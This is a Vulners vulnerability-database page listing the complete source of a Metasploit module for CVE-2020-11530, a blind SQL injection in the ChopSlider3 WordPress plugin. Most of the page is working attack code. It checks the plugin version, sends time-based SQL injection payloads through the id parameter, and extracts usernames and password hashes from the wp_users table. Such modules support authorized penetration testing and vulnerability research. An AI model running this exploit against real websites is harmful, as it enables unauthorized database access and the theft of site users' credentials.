Vulners
Lucene search
WordPress ChopSlider3 id SQLi Scanner
🗓️ 18 Feb 2021 17:42:21Reported by h00die, SunCSR, Callum Murphy <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 85 Views
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | WordPress ChopSlider 3 SQL Injection Vulnerability | 9 May 202000:00 | – | zdt |
 | CVE-2020-11530 | 8 May 202000:00 | – | attackerkb |
 | CVE-2020-11530 | 18 Feb 202111:04 | – | circl |
 | WordPress Chop Slider SQL Injection Vulnerability | 11 May 202000:00 | – | cnvd |
 | SQL Injection Over HTTP Traffic (CVE-2020-11530; CVE-2020-17463; CVE-2020-17506; CVE-2020-25990; CVE-2020-27481; CVE-2020-5766; CVE-2020-8655; CVE-2020-8656; CVE-2020-9465) | 18 Nov 202000:00 | – | checkpoint_advisories |
 | CVE-2020-11530 | 8 May 202019:10 | – | cve |
 | CVE-2020-11530 | 8 May 202019:10 | – | cvelist |
 | WordPress Chop Slider 3 SQL Injection | 5 Jun 202000:00 | – | dsquare |
 | WordPress Chop Slider 3 - Blind SQL Injection | 13 Jun 202613:20 | – | nuclei |
 | CVE-2020-11530 | 8 May 202020:15 | – | nvd |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
include Msf::Exploit::SQLi
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress ChopSlider3 id SQLi Scanner',
'Description' => %q{
The iDangero.us Chop Slider 3 WordPress plugin version 3.4 and prior
contains a blind SQL injection in the id parameter of the
get_script/index.php page. The injection is passed through GET
parameters, and thus must be encoded,
and magic_quotes is applied at the server.
},
'Author' => [
'h00die', # msf module
'SunCSR', # edb module
'Callum Murphy <[email protected]>' # full disclosure
],
'License' => MSF_LICENSE,
'References' => [
['EDB', '48457'],
['CVE', '2020-11530'],
['URL', 'https://seclists.org/fulldisclosure/2020/May/26']
],
'Actions' => [
['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }],
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
},
'DefaultAction' => 'List Users',
'DisclosureDate' => '2020-05-12'
)
)
register_options [
OptInt.new('COUNT', [false, 'Number of users to enumerate', 1]),
]
end
def check
res = send_request_raw({
'method' => 'GET',
'uri' => target_uri.path
})
fail_with Failure::Unreachable, 'Connection failed' unless res
if res && res.body =~ /idangerous.chopslider-(\d\.\d).css-css/
v = Rex::Version.new(Regexp.last_match(1))
print_status "Version detected: #{v}"
if v <= Rex::Version.new('3.4')
return Msf::Exploit::CheckCode::Appears
end
end
Msf::Exploit::CheckCode::Unknown
end
def run_host(ip)
unless wordpress_and_online?
vprint_error('Server not online or not detected as wordpress')
return
end
# this didn't come with a readme file
# checkcode = check_plugin_version_from_readme('chopslider', '3.4')
if check == Msf::Exploit::CheckCode::Unknown
vprint_error('ChopSlider3 version not vulnerable or undetected')
return
else
print_good('Vulnerable version of ChopSlider3 detected')
end
sliderid = Rex::Text.rand_text_numeric(8..10)
@sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
if payload.include?("''")
payload.gsub!("''", 'hex(0x00)')
end
payload = Rex::Text.uri_encode(payload)
res = send_request_raw({
'method' => 'GET',
'uri' => "#{normalize_uri(target_uri.path, 'wp-content', 'plugins', 'chopslider', 'get_script', 'index.php')}?id=#{sliderid}%20OR%20#{rand(0..10)}<>#{rand(11..1000)}%20AND%20#{payload}"
}, 20, true)
fail_with Failure::Unreachable, 'Connection failed' unless res
end
unless @sqli.test_vulnerable
print_bad("#{peer} - Testing of SQLi failed. If this is time based, try increasing SqliDelay.")
return
end
columns = ['user_login', 'user_pass']
print_status('Enumerating Usernames')
un = @sqli.dump_table_fields('wp_users', [columns[0]], '', datastore['COUNT'])
print_status('Enumerating Password Hashes')
pass = @sqli.dump_table_fields('wp_users', [columns[1]], '', datastore['COUNT'])
un = un.zip(pass)
table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
un.each do |user|
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: user[0],
private_type: :nonreplayable_hash,
jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]),
private_data: user[1],
service_name: 'Wordpress',
address: ip,
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
table << [user[0][0], user[1][0]]
end
print_good(table.to_s)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jan 2026 18:59Current
9.5High risk
Vulners AI Score9.5
CVSS 27.5
CVSS 3.19.8
EPSS0.92755